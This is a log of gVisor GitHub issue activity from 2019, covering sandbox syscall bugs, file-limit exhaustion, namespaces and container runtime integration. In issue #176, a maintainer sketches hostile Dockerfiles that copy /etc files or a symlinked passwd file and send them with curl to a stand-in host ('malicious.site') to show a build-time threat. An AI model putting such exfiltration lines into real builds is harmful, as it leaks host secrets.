[2019-03-25 04:45] amscanne opened #148 "opening a socket via /proc/pid/fd/X should give ENXIO"
Currently gives EIO.

[2019-03-25 13:56] D-Nice commented on #145
@avagin I'll give it a go hopefully some time today and let you know

[2019-03-25 16:51] avagin commented on #144
Could you show output for these three commands?
$ sudo unshare -Ur true && echo PASS;
$ sudo unshare -Urpfimun true && echo PASS
$ cat /proc/sys/kernel/unprivileged_userns_clone

[2019-03-25 16:53] mirabilos commented on #144
I believe you’re on to something:

[code]

Outside of the AMD64 chroot, these pass.

[2019-03-25 16:54] mirabilos commented on #144
[code]

What should I look for, if one operation works but not the other?

[2019-03-25 16:57] nixprime commented on #144
Linux forbids creation of user namespaces while in a chroot. The man pages for both clone(2) and unshare(2) use the same wording:

[code]

[2019-03-25 17:00] mirabilos commented on #144
Hm, that’s bad… I cannot test outside of the chroot as docker is not available for x32… I guess I’ll have to fire up a VM for that then.

Since this setup is not unusual, can you detect it and output a precise error message for this case?

Also fun: “Linux forbids creation of user namespaces while in a chroot” is not entirely right:

[code]

Linux forbids it while in a chroot whose root is not the

[2019-03-25 17:01] avagin commented on #143
https://gvisor-review.git.corp.google.com/c/gvisor/+/15980

[2019-03-25 17:23] mirabilos opened #149 "installing packages not possible: “too many open files”"
I’ve (now on an amd64 VM) tried to install build-essential and other packages into a debian:buster container/image(?), and it failed:

[code]

In a previous attempt, another file was affected, and it led to curious things:

[code]

It also failed when I tried `ulimit -n 512` before the `apt-get install` call.

----

Other useful information to include is:

[code]

[2019-03-25 17:30] mirabilos opened #150 "installing packages not possible: no user _apt, or cannot open file"
Similar to #149 and in the same environment.

I restarted a fresh `debian:buster` session and installed some packages as I went. Then I realised I need the full perl, and get:

[code]

I think something with file access is broken in gvisor. (I admit I did not try without runsc, but can do if necessary.)

[2019-03-25 17:34] avagin commented on #144
You can try to use pivot_root instead of chroot.

[2019-03-25 17:42] mirabilos opened #151 "Running script(1) to get a controlling tty not supported due to signal handler issue"
Same environment as in #149

[code]

[2019-03-25 17:46] mirabilos commented on #151
It’s worse, `/dev/tty` does not exist and cannot be created.

[2019-03-25 17:53] mirabilos opened #152 "Difference from Linux in file access checks"
Same environment as in #149, although I’ve created a custom image for this:

[code]

(The `regress:no-ctty` is necessary due to #151 as all the tests needing a controlling tty will fail. (`mknod /dev/tty c 5 0` will also fail.))

## tl;dr

The test fails because of this:

        mkdir a
        echo x >a/b
        chmod 0 a
        test -e a/b; echo 2e $? .
        test -f a/b; echo 2f $? .

Both

[2019-03-25 17:56] mirabilos commented on #152
… oh, wait… I just realised that this runs as root, and I’ve rechecked outside of the chroot, and the test will fail there as well. Oops, closing.

This means that the mksh testsuite for a binary built *outside* docker/gvisor will work, if you get it to working at all (see #149, #150) and only the tests that don’t need a controlling tty (see #151). This is a pretty good coverage of Linux syscalls.

[2019-03-25 17:56] #152 closed

[2019-03-25 17:58] mirabilos commented on #144
It’s not so easy… my actual setup is an `schroot` instance, not a simple call to chroot, with a persistent session running, dæmons in the background, and optionally multiple shells into that session. The chroot(8) calls were just for testing.

Anyway, it’s okay to not support this if the underlying OS troubles you so, but *if* a precise warning can be emitted, please do so.

Thanks!

[2019-03-25 18:41] prattmic commented on #147
cc @nixprime

Can you expand on the difference in behavior you are seeing? This program touches a page in a file that doesn't exist (the file is size 0). That such cause a SIGBUS, which is what I see on Linux (4.19):

[code]

The program also receives a SIGBUS in gVisor in my test.

[2019-03-25 19:00] amscanne opened #153 "gVisor doesn't support executable stacks or READ_IMPLIES_EXEC personality"
Arguably this is a feature to stop insecure programs, but...

The prot flags of the ELF PT_GNU_STACK segment indicate whether or not the binary stack should be executable[1] and, by extension, whether all PROT_READs should be expanded to include PROT_EXEC[2].

If PT_GNU_STACK is omitted, Linux defaults to an executable stack. gVisor completely ignores this segment and never maps an executable stac

[2019-03-25 20:08] amscanne opened #154 "Pseudoterminal job control"
gVisor PTYs must implement job control and related features. These include sessions, foreground/background processes, and signal handling.

[2019-03-25 20:09] amscanne opened #155 "Remove package kernel dep from package strace"
The strace package is passed the Task so it can use t.CopyIn. It would be fine with just a context.Context, as it can use usermem.CopyObjectIn.

This will allow the kernel package to import the strace package, avoiding some interfaces.

[2019-03-25 20:09] amscanne opened #156 "Expand RLIMIT_DATA to enforce .data + .bss in addition to heap"
Presently, MemoryManager.Brk only enforces RLIMIT_DATA for the heap because .data and .bss information isn't plumbed from the loader.

[2019-03-25 20:10] amscanne opened #157 "gVisor VDSO may span multiple maps entries"
The VDSO mapped by the sentry has a writable segment, so we have more than one maps entry.

Linux always has a single VDSO entry.

We currently avoid advertising the VDSO in maps to avoid breaking userspace programs that expect a single VDSO entry.

[2019-03-25 20:10] amscanne opened #158 "Implement process_vm_readv and process_vm_writev for the same user only"
(We can disregard the cases were cap_sys_ptrace is required)

[2019-03-25 20:11] amscanne opened #159 "Set SignalContext64 Err, Trapno, and Cr2"
Err is the hardware error code, Trapno is the hardware trap number, and Cr2 is the value of CR2 for page faults.

[2019-03-25 20:11] amscanne opened #160 "ptrace and most proc files should be inaccessible to users if binary is not readable"
Calling execve on a binary with execute permissions but no read permissions is allowed. However, the resulting task is marked non-dumpable[1] by the kernel.

This affects __ptrace_may_access[2], which enforces access by ptrace and to many proc files.

Basically, execute-no-read binaries are a subset of typical setuid binaries.

[1] https://elixir.bootlin.com/linux/v5.0.4/source/fs/exec.c#L1316
[2]

[2019-03-25 20:12] amscanne opened #161 "Send SIGPIPE when writing to a closed pipe/socket"
man 2 write:

"EPIPE  fd is connected to a pipe or socket whose reading end is closed.  When this happens the writing process will also receive a SIGPIPE signal.  (Thus, the write return value is seen only if the program catches, blocks or ignores this signal.)"

As is typical, the man page oversimplifies things. For sockets there are three different behaviors (that I've found so far):

SOCK_STREA

[2019-03-25 20:14] prattmic commented on #161
Note: those semantics are for UDS. I'm not sure about TCP, UDP, or other types of sockets.

[2019-03-25 20:22] amscanne commented on #152
Re: detection, yeah, we figure there are going to be many ways to detect gVisor. We don't provide anything official to do this, but don't assume it will be a secret to an application that really wants to know. (We could do things like randomize uname, but there's always going to be some other way to do it.)

Thanks for these reports! We will triage.

These are the tests found in the [mksh reposito

[2019-03-25 20:42] amscanne opened #162 "Share clock frequency between monotonic and realtime clock"
This could probably make clock updates slightly more efficient (only one clock update).

[2019-03-25 20:42] amscanne opened #163 "/proc/PID/uid_map doesn't handle trailing NUL-bytes"
runsc writes "65534 65534 1\n\0", which makes the sentry return EINVAL.

[2019-03-25 20:43] amscanne opened #164 "Many /proc/PID files do not return the appropriate errors for exited tasks."
By "exited", I mean killed and waited on.

Many /proc/PID files aren't tested at all for zombied (killed but not waited on) or exited tasks, but should be. Not just to check for error values, but also because these files usually depend on Task state, which is often in a partially destroyed state for zombied and exited tasks. In the past, we've had proc files that would panic the sentry if read in

[2019-03-25 20:44] amscanne opened #165 "Implement sysfs syscall"
Does someone need this, or is this just bookkeeping all of the unimplemented syscalls? The man page explicitly says "This System-V derived system call is obsolete; don't use it.  On systems with /proc, the same information can be obtained via /proc/filesystems; use that interface instead."

[2019-03-25 22:08] amscanne opened #166 "shellinabox does not work as expected"
I believe this may be caused by a bug or deficiency in the pseudo-terminal implementation. You can recreate using runsc by running a image created with the following Dockerfile:

FROM ubuntu
EXPOSE 8080
RUN apt-get update && apt-get install -y shellinabox
CMD ["shellinaboxd", "--debug", "--port", "8080", "--disable-ssl", "--service", "/:root:root:/:SHELL"]

The programs do not run because they can

[2019-03-25 22:08] amscanne opened #167 "ptrace platform treats 32-bit syscalls as 64-bit syscalls"
e.g., exit_group from compatibility mode (252) looks like this:

I0724 14:22:17.040598   33365 x:0] [   6] 32bit_gunit_tes E ioprio_get(0x7f2b92451818, 0x40001000)
I0724 14:22:17.040617   33365 x:0] [   6] 32bit_gunit_tes X ioprio_get(0x7f2b92451818, 0x40001000) = 0x0 errno=1 (operation not permitted) (1.606Âµs)

[2019-03-25 22:09] amscanne opened #168 "Remove ptrace FS_TLS_SEL / GS_TLS_SEL fixup"
As of Linux 4.7 (731e33e39a5b95ad77017811b3ced32ecf9dc666), this behavior no longer exists.

[2019-03-25 22:09] amscanne opened #169 "Enforce RLIMIT_NPROC"

[2019-03-25 22:10] amscanne opened #170 "iptables support for Istio"
Istio iptables configuration is done in this file: https://github.com/istio/istio/blob/master/tools/deb/istio-iptables.sh

In short, it needs many nat and mangle settings to redirect incoming and outcoming traffic to Envoy proxy.

[2019-03-25 22:10] amscanne opened #171 "Create independent roots for multi-containers"

[2019-03-25 22:11] amscanne opened #172 "runsc events' per container"
Runsc should provide container stats for containers inside the sandbox.

The stats should be at least contain cpu and memory usage.

Should probably provided with `runsc events --stats`

[2019-03-25 22:11] amscanne opened #173 "tcpdump support"

[2019-03-25 23:10] mirabilos commented on #152
Adin Scannell dixit:

OK, sure. It helps, anyway.

Indeed, they are.

They’ve proven a good compiler/toolchain/libc/kernel testsuite
as well, sometimes spotting OS bugs, often with signal delivery.
This was my entire idea, testing how good gvisor abstracts Linux.

But I closed this particular issue since it turns out it was
my fault. The only tests I could not successfully run out of
the entire te

[2019-03-25 23:54] nixprime commented on #142
Reads and writes are always consistent *within* the sandbox. The policies in question only affect when pages become cached; if a page is cached, it will be used for both reads and writes.

This wouldn't address any of the other reasons to favor the host page cache over the sentry page cache. There are other reasons as well; for example, even if we had more precise signals on when and how much to e

[2019-03-26 00:08] GuhuangLS commented on #142
Hi nixprime . @nixprime
"we'd have difficulty prioritizing pages for eviction because we don't have access to page table accessed bits."
At sentry/platform/ring0/pagetables/pagetables_x86.go: Set () ：
access bit is set at pte;
Can we use this information?

[2019-03-26 00:40] fvoznika commented on #151
`script` is failing because it uses `signalfd64`. See #139.

[code]

[2019-03-26 01:07] fvoznika commented on #150
Can you repro it? I ran it locally and it worked. Maybe it has to do with some of the packages you installed before?

[code]

[2019-03-26 01:13] amscanne commented on #150
Error 24 is EMFILE, which indicates that we're probably hitting the same case as in #149. I suspect that in your setup you have a lower RLIMIT_NOFILE and we're not handling the case properly where that limit is hit. (Error just propagating through to the application.)

[2019-03-26 04:25] tanjianfeng commented on #147
Apologies for the inaccuate description, I was trying to use an existing file (not a new file). Let's change the file path to /etc/passwd. Here is what I saw on gvisor:

[code]

[2019-03-26 07:18] liusdu opened #174 "gofer start up failed when using runsc directly to start container"
when directly use runsc to start container. like this `runsc  -panic-signal 12 --debug --debug-log=log/ run container` , gofer failed to start with error
[code]

[2019-03-26 07:21] liusdu commented on #174
Commit  "e420cc3e5d2066674d32d16ad885bee6b30da210" may introduce this.
I send a merge requset https://gvisor-review.googlesource.com/c/gvisor/+/16080

[2019-03-26 10:34] mirabilos commented on #150
Adin Scannell dixit:

The default “ulimit -n” inside Docker seems to be 1048756, which
comes over as a bit high. But even if I lower it to 512, the error
occurs.

[2019-03-26 17:16] fvoznika commented on #149
The problem here is that the Sentry (gVisor's kernel) is not closing files properly (most likely a refcount problem). After `apt-get install` above returns, there are still 438 open files. The effect is worse on the gofer, because when a file is opened for write, it keeps both control and new file around which is not necessary anymore.

Until we fix it, you can workaround it by increasing RLIMIT_N

[2019-03-26 17:21] fvoznika commented on #150
This is hitting the issue in #149. The Sentry is not closing files properly and eventually the file limit is hit in the host. To workaround it, you would need to increase RLIMIT_NOFILE outside the sandbox. More details in #149. Thanks for the report!

[2019-03-26 17:21] #150 closed

[2019-03-26 17:22] fvoznika commented on #150
Duplicate of #149

[2019-03-26 17:24] amscanne commented on #149
You sure it's a leak? There is a dirent cache. Just seems likely that it's not handling a smaller limit gracefully.

[2019-03-26 17:33] fvoznika commented on #149
Not, I'm not sure. I didn't track down where there are coming from. It could indeed be from the dirent cache.

[2019-03-26 18:01] fvoznika commented on #149
You're right. If I drop size of dirent cache from 1000 (default) to 10, the number of open FDs drop to 38. So we need to make the dirent cache aware of the limit (and apply the host limit to the sandbox).

[2019-03-26 23:29] mrahatm commented on #146
This should be fixed by 06ec97a3f823f1f5d928fc9c2beb3a11c2c88487.

[2019-03-26 23:38] prattmic commented on #146
[code]

[2019-03-26 23:38] #146 closed

[2019-03-27 15:40] liusdu commented on #140
@ianlewis  Let me look at this if no one did it before~

[2019-03-27 18:11] #143 closed

[2019-03-27 23:41] #174 closed

[2019-03-27 23:44] D-Nice commented on #149
I've encountered similar "too many open files" with alpine and running `npm install` for example on a nodejs repo.

[2019-03-28 01:59] D-Nice commented on #145
@avagin still not working for me

[code]

built on commit 654e878abba174d8f7d588f38ecfd5a020bf581e and your patch applied. Current head failed to build for me at all so reverted to that commit.

[2019-03-28 02:32] avagin commented on #145
@D-Nice Could you double check that you compile with my patch and place a new runsc  binary to the right place. This error should not be reported with my patch.

[2019-03-28 14:36] D-Nice commented on #145
i will retry, I definitely built it with the patch, but I tried renaming the binary and re-pointing to the new binary in daemon.json instead of just replacing it.

[2019-03-28 16:02] avagin commented on #145
Maybe you forgot to restart a docker daemon.

[2019-03-28 16:15] D-Nice commented on #145
restarted it multiple times in fact, but i'll retry again without this naming complication.

[2019-03-28 16:41] nhooyr opened #175 "implement version subcommand"
When I set the default runtime for docker v18.09.4-rc1 to runsc, I see this in the logs repeating continuously:

[code]

Would be nice if there was a `version` subcommand to satisfy docker.

[2019-03-28 16:52] D-Nice commented on #145
Hmmm, seems the runtime would default to runsc, even if I changed path to runsc_ until I moved the original runsc binary out. The error at least differs now. It works fine as regular runsc when userns-remap is not enabled in the conf.

[code]

[2019-03-28 18:44] #147 closed

[2019-03-29 01:19] amscanne commented on #175
Looking at this now. Interesting that Docker seems to parse the version then ignore it in favor of the commit, which it records for later.

https://github.com/docker/docker-ce/blob/fec57a028b07018ac0539687c8138cfca9da7943/components/engine/daemon/info_unix.go#L37

There may be other assumptions that it makes based on that. Either way, I don't see any harm in supporting a --version flag, since it w

[2019-03-29 04:11] nhooyr opened #176 "Does running this as dockers default runtime make building arbitrary images secure?"
pretty much the title.

I want to build arbitrary Docker images in a secure manner. I’m aware there are builders for this but using gvisor would be convenient.

[2019-03-29 04:42] amscanne commented on #176
I don’t think so. The Dockerfile format is pretty flexible with respect to moving data around at the host level and other features. Off the top of my head, I could imagine:

FROM base
CP /etc/* .
RUN tar -cvzf foo.tgz . && curl -X POST —data foo.tgz http://malicious.site
ENTRYPOINT /innocent-service

[2019-03-29 04:46] amscanne commented on #176
Also: happy to discuss other aspects of what your goals are, here or on other issues.

[2019-03-29 05:07] nhooyr commented on #176
Well I would not build in the root directory of the host for sure. Docker doesn’t let copying outside the build context afaik.

[2019-03-29 05:15] amscanne commented on #176
It’s an interesting question. I’ll reopen for discussion.

My gut is that the model for Dockerfiles is unlikely to be built to defend against malicious contents. E.g. would it defend against this?

Directory:
Dockerfile
foo -> /etc

Contents of Dockerfile:
FROM base
COPY foo/passwd passwd
RUN curl ...

[2019-03-29 05:24] nhooyr commented on #176
It would as it would not follow the symlink outside the build context.

[2019-03-29 05:56] amscanne commented on #176
Interesting, it does seem to have solid handling for these kinds of simple symlink escapes. I'll need to think a bit more about it (and let others chime in).

[2019-03-30 03:44] chuangxueli commented on #149
hi,
I have also encountered  this issue. There may be some FD leak issues in the gofer
I used cypthon to test in gvisor ,and also merge your patch,but the issue still exists.I wrote one simple test  to verify this case .In the test,I open one file,and  do the reading,
then close it.at the same time I use isof  to see the the process gofer,the result is that ,there are more files pending to be clos

[2019-04-01 04:39] chuangxueli commented on #149
@fvoznika
Hi,fvoznika
Is there any update for this issue?
thanks
chuangxueli

[2019-04-01 11:51] mplebanski opened #177 "gVisor freezing on futex when kvm backend used"
docker_version: Docker version 18.09.4, build d14af54266
uname: Linux hostname 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
command: docker run --rm --runtime=runsc -ti ubuntu /bin/bash

My docker config:

[code]

`runsc` is available under `$PATH`.

It works when configured to use `ptrace`:

[code]

Find strace logs attached:

[docker_logs.txt](https

[2019-04-01 18:12] avagin commented on #145
@D-Nice could you attach runsc logs?
https://github.com/google/gvisor#debugging

[2019-04-01 18:44] fvoznika commented on #176
I don't think we can claim it makes building images _secure_. Most Dockerfile commands are executed directly in the host and could be vulnerable if there is a bug in the code. For example, apart from symlink handling, `COPY --chown` may need to parse `/etc/passwd` from the container's image.

Using runsc as the default runtime will make `RUN` instructions execute inside the sandbox. Sure, `RUN` is

[2019-04-02 03:31] amscanne commented on #175
Fixed in 7543e9e.

[2019-04-02 03:31] #175 closed

[2019-04-02 15:06] fvoznika commented on #139
There is no one currently working on this. Is this something you could work on?

[2019-04-02 16:06] fvoznika commented on #149
@chuangxueli, the sentry has a cache that saves the last 1000 dirent entries touched by the application. So when the application closes a file, it may not close the file from the underlying host. This includes the file and the directories used to walk to the file. This speeds up dir/file look up quite a bit.

For example, If you run `cat /etc/passwd` and then look at `ls -l /prod/[gofer-pid]/fd` y

[2019-04-02 20:23] D-Nice commented on #145
[runsc-debug.tar.gz](https://github.com/google/gvisor/files/3035781/runsc-debug.tar.gz)

uploaded as tar.gz

[2019-04-02 23:04] avagin commented on #145
@D-Nice you try to bind-mount /root into a container, but the root user of this container doesn't have enough rights to access the host /root directory.

You can try to remove this bind-mount from options:
$ sudo docker run --runtime=runsc --rm  -it ubuntu bash

[2019-04-03 01:27] amscanne commented on #177
Note that those logs are just the strace logs from "docker run" itself, which connects to the Docker daemon via a unix socket and doesn't do anything interesting.

Would it be possible to attach the debugging logs per the README?

[2019-04-03 08:37] mplebanski commented on #177
OK, config used:

[code]

Logs:

[runsc.log.20190403-103417.425823.boot.txt](https://github.com/google/gvisor/files/3037650/runsc.log.20190403-103417.425823.boot.txt)
[runsc.log.20190403-103417.336041.gofer.txt](https://github.com/google/gvisor/files/3037651/runsc.log.20190403-103417.336041.gofer.txt)
[runsc.log.20190403-103417.334220.create.txt](https://github.com/google/gvisor/files/3037652/runs

[2019-04-03 16:34] nhooyr commented on #154
Is this issue related?

[code]

shows
[code]

[2019-04-03 18:59] amscanne opened #178 "gVisor checks file permissions and file seek-ability/existance in the wrong order."
When attempting to perform a pread/pwrite syscall, Linux first checks whether the file is seekable, and then checks whether the file is readable/writable. This means if you try to pread on a write-only pipe, Linux returns ESPIPE (illegal seek).

gVisor however inverts the order of these checks. It checks for the file permissions in the syscall entry point (in sys_file), and then checks for seek-ab

[2019-04-03 19:00] amscanne opened #179 "Support bind mounts"
This likely requires the VFS refactor to land first.

[2019-04-03 19:00] amscanne opened #180 "Kubernetes FSGroup doesn't work with gvisor."
Kubernetes FSGroup document: https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems

What does Kubernetes FSGroup do?
1) Adds supplemental group to container process.
2) Set host volume group, and `setgid`.

Number 1) works for gvisor. But for 2), gvisor doesn't respect `setgid`.

[2019-04-03 19:01] amscanne opened #181 "sentry/time: consider a sequence number of read locking"
Done for KernelGuidedClocks, but not CalibratedClocks.

[2019-04-03 19:01] amscanne opened #182 "setSystemTime in kvm platform introduces TSC error"
The current mechanism uses a loop to calibrate, but there is still error.

[2019-04-03 19:02] amscanne opened #183 "kvm platform does not work with race runsc"

[2019-04-03 19:02] amscanne opened #184 "Provide file:line references in package log"
Right now we just emit "x:0". Maybe we don't want to do this at all?

[2019-04-03 19:03] amscanne opened #185 "hidepid support"
as part of PID namespaces, affecting procfs file system access.

[2019-04-04 01:10] ianlewis opened #186 "Syscall compatibility tool"
Add a tool to generate syscall compatibility information that can be used to automatically update the docs on the website.

[2019-04-04 07:22] zhuangqh opened #187 "critest: runtime should support ContainerPID"
## Problem

[code]

briefly describe what happens:

[code]

exec in container  `cat /proc/1/cmdline`

got: `/pause`
expected: 'master process'

## Version
containerd 1.2 + containerd-shim-runsc-v1
runsc: commit:  0b768871

[2019-04-04 07:26] zhuangqh opened #188 "critest: support mount propagation"
## Problem

critest v1.12

**mount with 'rprivate' should not support propagation**

[code]

**mount with 'rshared' should support propagation from host to container and vice versa **

[code]

**runtime should support mount propagation**

[code]
## Version

containerd 1.2 + containerd-shim-runsc-v1
runsc commit  0b768871

[2019-04-04 07:28] zhuangqh opened #189 "critest: privilege escalation"
## Problem

critest v1.12

**should allow privilege escalation when false**

[code]

## Version

containerd 1.2 + containerd-shim-runsc-v1
runsc commit  0b768871

[2019-04-04 07:49] zhuangqh opened #190 "CRI: container level resource limitation"
gvisor only support POD level resource limitation(cpu, mem etc.)
In CRI, there is no resource config in [RunPodSandboxRequest](https://github.com/kubernetes/cri-api/blob/master/pkg/apis/runtime/v1alpha2/api.proto#L362). While gvisor only set the cgroup value of runsc-sandbox when creating the first pause container. Thus there is no way to set the resource limitation for container created in CRI si

[2019-04-06 05:25] cedric05 commented on #58
can i work on it?

[2019-04-06 05:29] amscanne commented on #58
Absolutely! Let us know if you have any questions (here or on the gvisor-dev mailing list).

[2019-04-06 09:27] ianlewis commented on #190
Thanks for the issue. FYI #172 is also related.

[2019-04-06 09:34] ianlewis commented on #189
Could you maybe create this bug on the shim repo? CRI related issues should probably be handled there https://github.com/google/gvisor-containerd-shim/issues/new

[2019-04-06 09:34] ianlewis commented on #188
Could you maybe create this bug on the shim repo? CRI related issues should probably be handled there https://github.com/google/gvisor-containerd-shim/issues/new

[2019-04-06 09:35] ianlewis commented on #187
Could you maybe create this bug on the shim repo? CRI related issues should probably be handled there https://github.com/google/gvisor-containerd-shim/issues/new

[2019-04-06 09:37] ianlewis commented on #190
Note that per-container resource isolation isn't necessarily related to CRI but is needed to fully support CRI.

[2019-04-06 12:07] ianlewis commented on #103
@matti FWIW We finally got a website up and wrote a bunch of docs. Hopefully this is something like what you were looking for?
https://gvisor.dev/docs/user_guide/oci/

Let me know if there is anything else you'd like to see added. It's on my list of things to do to write a guide on the networking bits. https://github.com/google/gvisor-website/issues/38

[2019-04-07 12:05] cedric05 commented on #58
@amscanne i raised pr

[2019-04-08 04:26] Anjali05 opened #192 "gVisor IO performance"
I am runninng IO measurement(using dd) in gVisor in both kvm and ptrace mode. I am getting a better IO than runc and IO is almost same for kvm and ptrace. According to my understanding the gVisor performance should be worse than runc or is it what is expected? If so, can someoce clarify as to why it could be happening?

[2019-04-08 06:51] amscanne commented on #192
What do you mean by I/O?

There's one known case of better performance than native, which is large writes to internal memory-backed files. Because we represent the block sequences for user memory are range-based, rather than page-based, writing large blocks of memory actually involves fewer lookups.

What other kinds of experiments are you looking to do? Happy to help out or provide guidance where

[2019-04-08 07:24] joost14 opened #193 "systemd-cgroup support"
Hello,

I'm trying to setup Kubernetes(kubeadm) + CRI-O + runsc. I'm enabling the runtimes through the alpha feature gate RuntimeClass (crio is dropping support for `untrusted-workload`). I've got it to work with some other runtimes already, but I'm having some issues when trying to run runsc.

The error when I'm starting the pod is the following:
`kubelet, k8sworker01  Failed create pod sandbox:

[2019-04-08 14:53] Anjali05 commented on #192
@amscanne
I am measuring the IO throughput using this command
dd if=/dev/urandom of=/tmp/ioload.log bs=512kB count=100 conv=fdatasync oflag=dsync
For gVisor(both kvm+ptrace), I am getting around 184 MB/sec and for runc its around 54MB/sec.

Is this because of what you mentioned?

[2019-04-08 17:26] kevinGC commented on #193
I believe this is the kubelet and runtime (cri-o) not agreeing on how to manage cgroups for the pod, not something that gVisor doesn't have support for. Based on [this doc](https://github.com/filbranden/kubernetes-community/blob/009f067c6bc106d062a416d0a1537de5ffa8c023/contributors/design-proposals/node/cgroup-driver-kubelet-and-runtime.md), it some Linux distros require extra configuration.

[2019-04-09 01:16] fvoznika commented on #189
gVisor currently ignores the setuid/setgid bit in executables. Once setuid/setgid is implemented, we can plumb NoNewPrivs through.

[2019-04-09 03:09] D-Nice commented on #145
The above works, and mounting a path belonging to the user it's been remapped to works. So in that respect it now matches the runc behaviour, however, the mounting of the /root dir also works with runc but not runsc, but I guess that is safer (no access, rather than just no write) anyways, if the goal is not to match the regular runtime behaviour completely, and I personally probably wouldn't be d

[2019-04-09 03:17] D-Nice commented on #145
I presume this is now in the nightlies since the above linked commit?

Thank you all for your time and effort, as far as I'm concerned I'm satisfied with this current remap support.

[2019-04-09 06:10] zhuangqh commented on #189
thanks for your reply. I've created an issue on the shim repo https://github.com/google/gvisor-containerd-shim/issues/24.  close...

[2019-04-09 06:10] #189 closed

[2019-04-09 06:12] zhuangqh commented on #188
create an issue on the shim repo https://github.com/google/gvisor-containerd-shim/issues/25. close...

[2019-04-09 06:12] #188 closed

[2019-04-09 06:13] zhuangqh commented on #187
create an issue on the shim repo https://github.com/google/gvisor-containerd-shim/issues/26. closing...

[2019-04-09 06:13] #187 closed

[2019-04-09 09:40] chuangxueli opened #194 "network compatibility testing with cpython tool"
hi
I'm doing some ’compatibility testing with cpython test cases.The testing steps are below:
1,run the gvisor with --network=host,
sudo docker run --runtime=runsc  -it -v /mnt/cpython/:/test  ubuntu /bin/bash
2,then run the command ./python  ./Lib/test/test_socket.py in bash
3,check the test result,there are many failed items.These failed items are about the MsgFlag.MSG_CTRUNC issues, which are n

[2019-04-09 10:58] joost14 commented on #193
Hi @kevinGC,

Thanks for the information. Though it is still a bit strange that kata and runc work just fine when using systemd. So this issue may only is the case when using kubelet and crio?

[2019-04-09 17:06] avagin commented on #145
Here is one more patch on review. I think it will be merged today or tomorrow:
https://gvisor-review.git.corp.google.com/c/gvisor/+/15960

[2019-04-09 17:40] amscanne commented on #192
That gap seems way too big for that. I suspect this is a result of runsc not respecting the sync semantics. If you drop those flags I suspect you will see much different results.

[2019-04-09 17:46] prattmic commented on #192
Note as well that /tmp inside gVisor is usually a tmpfs, while on most Linux distros it is usually an on-disk filesystem (ext4). Comparing gVisor tmpfs to Linux tmpfs is likely a better comparison (/dev/shm/ should be a tmpfs on both).

[2019-04-09 18:25] Anjali05 commented on #192
@amscanne  @prattmic I will try without the sync flag. I am still curious as to why kvm and ptrace have the same IO. I went through their logs(.gofer file) but I do not see any difference in the way they are doing the syscalls. Can you elaborate on that?

[2019-04-11 02:29] cedric05 commented on #75
this seems to be leftout. can i work on it?

[2019-04-11 02:37] iangudger commented on #75
The current status is we believe that we fixed the issue, but someone needs to verify that shio now works correctly in gVisor.

[2019-04-11 06:33] amscanne commented on #192
The kvm mode does not run a hardware virtualized VM: the sentry runs in the host and as the guest OS.

The two platforms are likely similar because with a blocksize of 512kb, the time reading urandom and writing data likely dominates any platform costs.

[2019-04-11 07:11] cedric05 commented on #185
could you please elaborate it?
i'm new to kernel level things and i would like to give it a try.

[2019-04-11 07:33] cedric05 commented on #75
its working!!

[2019-04-11 13:28] iangudger commented on #75
Thanks for verifying! Closing this issue.

[2019-04-11 13:28] #75 closed

[2019-04-11 18:10] Anjali05 commented on #192
@amanda-tait So the container runs inside sentry in kvm platform and in the ptrace mode sentry only intercepts the syscalls made by container which runs as a normal container? Is this the difference between the two platforms? Does the kvm mode use QEMU or some other hypervisor?

[2019-04-11 18:24] amscanne commented on #192
QEMU is the user-space application that uses the kernel's KVM extensions to run hardware virtualized machines. The sentry also uses the kernel's KVM extensions to run code in a guest context. In both cases the kernel is the actual hypervisor.

The difference between the two is the hardware context in which the untrusted code is executed and how calls and traps are intercepted. For ptrace mode, cod

[2019-04-11 18:31] Anjali05 commented on #192
@amscanne  What's the role of the sentry in the ptrace mode if the trapping is done by the kernel?

[2019-04-11 18:36] amscanne commented on #192
The trapping is done by the kernel but the implementation of everything that an application sees and interacts with is within the sentry. By trapping, I mean that when the application executes the syscall instruction, hits a fault, etc. the host kernel sees that, puts the execution stub in a wait state, notifies the sentry, which then picks it up again There are no processes on the host system tha

[2019-04-12 05:50] fvoznika commented on #193
`runsc` doesn't implement the `-systemd-cgroup` flag. `runsc` implements cgroups using cgroupfs, as you noted when you set `KUBELET_EXTRA_ARGS=--cgroup-driver=cgroupfs`. Is that something that works for you?

[2019-04-12 05:56] fvoznika commented on #190
Currently, `runsc` only supports cgroup configuration for the entire pod. Even when container cgroup isolation is implemented, you would still want to set cgroup around the pod, because you can't really trust limits set inside the sandbox as it can be compromised. One possibility would be to create a cgroup for the pod with no limits when the pause container is started, and then modify it as neede

[2019-04-12 08:09] zhangningdlut commented on #139
We (I am from antfin) have requirements for signalfd, but we are not starting working on this neither.
If you are intersiting in this, we can discuss the plan.

[2019-04-12 11:09] ustiugov opened #195 "Operation timed out when using iperf3"
Hi everyone,

I am experiencing a connectivity problem when using iperf3. I am booting a docker container with the following cmd:
`docker run -dit --name alpine1 --runtime=runsc -p 52022:22 -p 42022:5201 alpine ash`

After configuring SSH and few other things, I am able to SSH into the container from the remote machine, no problem. However, when I start an iperf3 server inside that container and t

[2019-04-12 11:26] joost14 commented on #193
Hi @fvoznika,

I know `runsc` doesn't implement the flag. I was just wondering if `systemd` was compatible with `runsc `or if it is just some configuration error on my part.

[2019-04-12 14:27] hbhasker commented on #195
Thanks for the bug report. I captured a packet trace from inside the sandbox and outside and what I see is that for some reason the connection is getting hung with both sides acking each other but connection not progressing.

From inside sandbox.

I0412 14:22:48.372866       1 x:0] recv tcp 172.17.0.1:46206 -> 172.17.0.2:5201 len:0 id:b29c flags:0x02 ( S    ) seqnum: 1357107984 ack: 0 win: 29200 x

[2019-04-13 01:53] hbhasker commented on #195
So I did more investigation. I think this is a bug in the iperf3 client from what I can see or something really odd is going on.

Here's an strace of what the client is doing. NOTE: After reading the 1 byte of '\t' it does two more writes to the same fd of 4 bytes then another one of 97 bytes which has the parameters for the connection.

connect(3, {sa_family=AF_INET, sin_port=htons(5201), sin_add

[2019-04-13 02:10] hbhasker commented on #195
Gah Apologies. I think this was my WAI runsc binary which has a bug with rcvWnd. ITs advertising a receive window of zero after the accept. Let me try without my fixes and see.

[2019-04-13 02:27] hbhasker commented on #195
Okay I fixed the bug and it works just fine. I am not seeing any issues. Any reason you are using port forwarding?

[2019-04-13 04:01] hbhasker commented on #195
